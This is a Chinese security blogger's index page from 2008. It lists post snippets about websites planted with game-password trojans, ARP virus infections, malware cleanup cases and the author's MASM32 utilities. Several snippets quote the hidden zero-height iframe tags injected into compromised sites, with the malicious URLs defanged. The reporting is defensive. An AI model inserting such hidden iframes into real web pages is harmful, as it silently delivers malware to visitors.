- 博客(21)
- 资源 (53)
- 问答 (1)
- 收藏
- 关注
原创 某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbgendurer 原创2008-02-29 第1版1.网站首页包含代码:/---<iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0></iframe>---/1.1 hxxp://pop**.i**ms**e*e*.cc/g3.
2008-02-29 12:27:00 1344
翻译 僵尸网络会被击败吗?
Can botnets be beaten?僵尸网络会被击败吗?Date: February 19th, 2008Author: Justin Fielding作者:Justin Fielding翻译:endurer,2008-02-28 第1版Category: security, Botnet, cybercrime分类:安全,僵尸网络,网络犯罪Tags: Network, Command
2008-02-28 21:38:00 4239 1
原创 用MASM32写GUI版的netstat--NetViewG.exe v0.0.0001 beta1
用MASM32写GUI版的netstat--NetViewG.exe v0.0.0001 beta1下载地址1:http://download.csdn.net/source/361970下载地址2:http://purpleendurer.ys168.com/ 的tools目录下先前发了一个CUI的版本,见:用 MASM32 写的 4.5KB 的 netstat--NetViewhttp
2008-02-27 17:54:00 1377
原创 ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等endurer 原创2008-02-26 第1版该病毒会向所网页加入代码:/---<iframe src=hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM width=0 height=0></iframe>---/1 hxxp://a**d*.1**02**4.m
2008-02-27 14:12:00 2073
转载 关闭Windows 文件保护的方法
http://www.bitsum.com/aboutwfp.asp#Hack_Method_5 [ Back to Bitsum Technologies ] Last Revision: 01/01/06Work in progress! Under construction, etc..
2008-02-26 14:13:00 3160
转载 Windows 文件保护的注册表设置
http://support.microsoft.com/kb/q222473/察看本文应用于的产品function loadTOCNode(){} 文章编号 : 222473 最后修改
2008-02-26 14:04:00 1552
原创 机器狗打败卡卡狮?瑞星监控变红伞2
机器狗打败卡卡狮?瑞星监控变红伞2endurer 原创2008-02-24 第1版(续:机器狗打败卡卡狮?瑞星监控变红伞1http://blog.csdn.net/Purpleendurer/archive/2008/02/23/2114717.aspxhttp://endurer.bokee.com/6634438.htmlhttp://blog.nnsky.com/blog_view_
2008-02-24 21:43:00 1242
原创 机器狗打败卡卡狮?瑞星监控变红伞1
机器狗打败卡卡狮?瑞星监控变红伞1endurer 原创2008-02-23 第1版前天,一位网友求助,说他的电脑可能中了病毒,瑞星监控绿伞变成红伞了,系统反应很慢,请偶帮忙检修~下载 pe_xscan 扫描log 发现如下可疑项(进程模块部分有省略): /===pe_xscan 08-02-19 by Purple Endurer2008-2-21 17:40:52Windows
2008-02-23 10:56:00 2379
原创 用MASM32写的 HttpRead 0.0.0001 beta2
用MASM32写的 HttpRead 0.0.0001 beta2 从6.0 SP2开始,IE 不再支持view-source:协议,虽然 FireFox支持该协议,但为此而安装 FireFox又实在是小题大作…… 于是就有HttpRead下载地址:http://download.csdn.net/source/358215主要改进:1、使用wininet中的API来读取。而 Be
2008-02-22 14:18:00 1209
原创 对 Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析
对 Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析endurer 原创2008-02-21 第1版就是Worm.Win32.Diskgen.gen/磁碟机也捎带广告?http://blog.csdn.net/Purpleendurer/archive/2008/02/20/2110363.aspx中的捕获的一个病毒文件。文件说明符 : C:
2008-02-21 13:59:00 1608
原创 Worm.Win32.Diskgen.gen/磁碟机也捎带广告?
Worm.Win32.Diskgen.gen/磁碟机也捎带广告?endurer 原创2008-02-19 第1版 昨天一位朋友说他的电脑中毒了,不定期弹广告,系统反应很慢,请偶帮忙检修。 打开任务管理器检查进程,发现有2个alg.exe,2个lsass.exe,用户名分别是system和user,终止属于user的,不料电脑自动重启~ 那偶就顺势选择使用带网络连接的的安全模式来启动,
2008-02-20 21:48:00 1730
原创 08-02-19>pe_xscan 增加Windows启动模式和对SuperHidden值检测和报告
2008-02-191、检测并报告 Windows启动模式(向HijackThis 的log看齐)2、检测并报告注册表中SuperHidden键值的信息。近期的恶意程序已经开始利用这个键了。
2008-02-19 23:27:00 1352
原创 KV2007查杀病毒后桌面无显示?原来是网游盗号木马惹的祸2
KV2007查杀病毒后桌面无显示?原来是网游盗号木马惹的祸2endurer 原创2008-02-19 第1版(续:KV2007查杀病毒后桌面无显示?原来是网游盗号木马惹的祸1http://blog.csdn.net/Purpleendurer/archive/2008/02/18/2102640.aspx)系统日期居然被改到2000年了,改回来……到 http://tool.ika
2008-02-19 14:39:00 2694
原创 KV2007查杀病毒后桌面无显示?原来是网游盗号木马惹的祸1
KV2007查杀病毒后桌面无显示?原来是网游盗号木马惹的祸1 endurer 原创2008-02-18 第1版 一位网友安装了从网上下载的游戏,KV2007查杀出了一些病毒。重启电脑后桌面一片空白,没有任务栏,也没有图标。让偶帮忙检修。 当 windows 的“壳”程序 explorer.exe没有正常加载,就会出现这种故障。 按Ctrl + Shift+ Esc 打开任务管理器,选
2008-02-18 13:26:00 2073
原创 输入密码登录系统后又自动注销?原来是机器狗惹的祸2
输入密码登录系统后又自动注销?原来是机器狗惹的祸2endurer 原创2008-02-17 第1版(续输入密码登录系统后又自动注销?原来是机器狗惹的祸1 http://blog.csdn.net/Purpleendurer/archive/2008/02/15/2097467.aspx)运行瑞星卡卡安全助手,自动扫描出2个流氓软件,清除了。在[高级功能]—>[插件管理及卸载]里,把O2
2008-02-17 10:56:00 3167
原创 输入密码登录系统后又自动注销?原来是机器狗惹的祸1
输入密码登录系统后又自动注销?原来是机器狗惹的祸1endurer 原创2008-02-15 第1版 一位网友因为好奇而打开了有激情照的网页连接,不幸中标。在用瑞星查杀病毒后就出现了问题:输入帐户密码登录系统后又自动注销。引起这种情况的原因一般是Windows系统文件userinit.exe出的问题。 用Windows XP的安装光盘启动,选择恢复控制台,用命令dir c:/wi
2008-02-15 17:29:00 4872
原创 偶遇ARJ,释放DOS时代记忆~
偶遇ARJ,释放DOS时代记忆~Purple Endurer 原创2008-02-14 第1版 在帮一位同事装业务软件时,很惊奇地发现一些数据文件名的扩展名是ARJ,这可是用ARJ软件压缩的呀~想不到在Vista时代还能遇到ARJ…… 从DOS时代开始玩电脑的应该没有人会不知道ARJ这个软件罢?有兴趣的朋友可以看看:ARJ Software, Inchttp://www.arjso
2008-02-14 23:10:00 4281 22
原创 一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站endurer 原创2008-02-13 第1版一位网友反映说他所管理的网站出了问题,打开任一网页,杀毒软件就报病毒。检查该网站的网代码,发现:/---<iframe src=hxxp://xxx.hu*i**la**ib*a*.info/104.htm width=100 height=0></ifra
2008-02-13 22:26:00 3664 1
原创 用 MASM32 写的 4.5KB 的 netstat--NetView
用 MASM32 写的 4.5KB 的 netstat--NetView下载地址:http://download.csdn.net/source/352031NetView 的功能与Windows自带的 netstat 命令相似,用于显示协议统计信息和当前 TCP/IP 网络连接,但文件体积就苗条多了……文件说明符 : F:/masm32/works/Net_View/NetView.
2008-02-11 18:45:00 1730
原创 某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rqendurer 原创2008-02-04 第1版在该坛页面中发现代码:/---<iframe src=hxxp://www.i***p*5*60.com/error.htm width=100 height=1></iframe>---/1 hxxp://www.i***p*5*60.com/error.h
2008-02-04 14:30:00 1412
原创 某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等endurer 原创2008-02-02 第1版打开该网站后IE失去响应……在该网站首页底部发现代码:/---<iframe src="hxxp://8**8.8*812**15.com/88.htm" width=0 height=0></iframe>---/1 hxxp://8**
2008-02-02 18:08:00 1954
用 HTML + JavaScript 打造的渐进式延迟法定退休年龄测算器
2024-09-15
免费图片浏览软件 IrfanView 64-bit 英文版
2024-06-30
MASM32编程通过WMI获取Windows用户帐户信息的控制台程序,小巧精炼,适合bat调用,重定向输出
2023-09-03
HTML+JavaScript+CSS DIY 分隔条splitter代码
2023-09-02
sysInfo(电脑系统信息)
2023-05-29
TcpStatC-增加显示PID和对应进程文件说明符
2022-08-14
TcpStatC.zip
2022-07-31
MASM32v11中的kernl32p.inc和kernl32p.lib存在bug,这是修正后的版本。
2022-07-30
MASM32v11版本中kernel32.inc和Kernel32.lib修正版。
2022-07-30
sysInfo-0_0_0001.zip
2021-11-04
Word启动故障修复程序FixWord
2017-01-16
MASM32编程实现运行时自动提示要求以管理员帐户来运行的演示源代码和exe
2017-01-05
用MASM32来DIY判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用lstrcmp,区分大小写)
2014-10-16
用MASM32来DIY一个判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用repe cmpsb指令,区分大小写)
2014-10-04
添加浮动按钮点击滚动到网页底部的纯JavaScript演示代码
2014-09-06
用MASM32写的 系统托盘图标管理员 TrayIconMan 0.0.0003
2012-02-17
定时关机、重启、注销、待机、修眠程序ClosePC 0.0.0.1 beta4
2011-08-04
用MASM32编写的网络时间同步/校正程序-adjTime.exe
2011-06-11
查看备份系统开/关机&用户登录/注销记录BootClos 0_0_0001_beta2
2011-05-26
BootClos 0.0.0001 beta1—查看、备份系统开关机记录
2011-05-21
DelUninstall_0_0_0001Beta4
2011-01-16
Speaker——用MASM32编写的文本朗读程序(7KB)
2010-07-24
MASM32编程通过WMI获取杀毒软件信息(源代码+exe)
2010-05-24
MASM32编程通过WMI获取Windows计划任务(源代码+EXE下载)
2010-04-19
用MASM32写的定时关机、重启、注销程序ClosePC 0.0.0.1beta1
2010-03-06
MASM32编程由WMI获取BIOS、主板、硬盘、CPU、网卡的信息(源代码+exe)
2009-10-21
FileInfo 0.0.0012
2009-10-09
DelUninstall_0_0_0001Beta3
2009-06-02
分析、获取命令行参数的MASM32演示程序
2009-04-16
IEFO_Man 0.0.0.1 beta1(映像劫持项目管理程序)
2009-03-03
MASM32编程获取任务栏高度
2008-09-21
FileInfo 0.0.0011
2008-07-17
FileInfo 0.0.0010 --修正bug,提升速度
2008-06-29
FileInfo 0.0.0009 -- 增强文件数字签名的检测
2008-06-09
FileInfo 0.0.0008
2008-05-31
Windows 10 计算器 显示的是多少?
2022-07-31
TA创建的收藏夹 TA关注的收藏夹
TA关注的人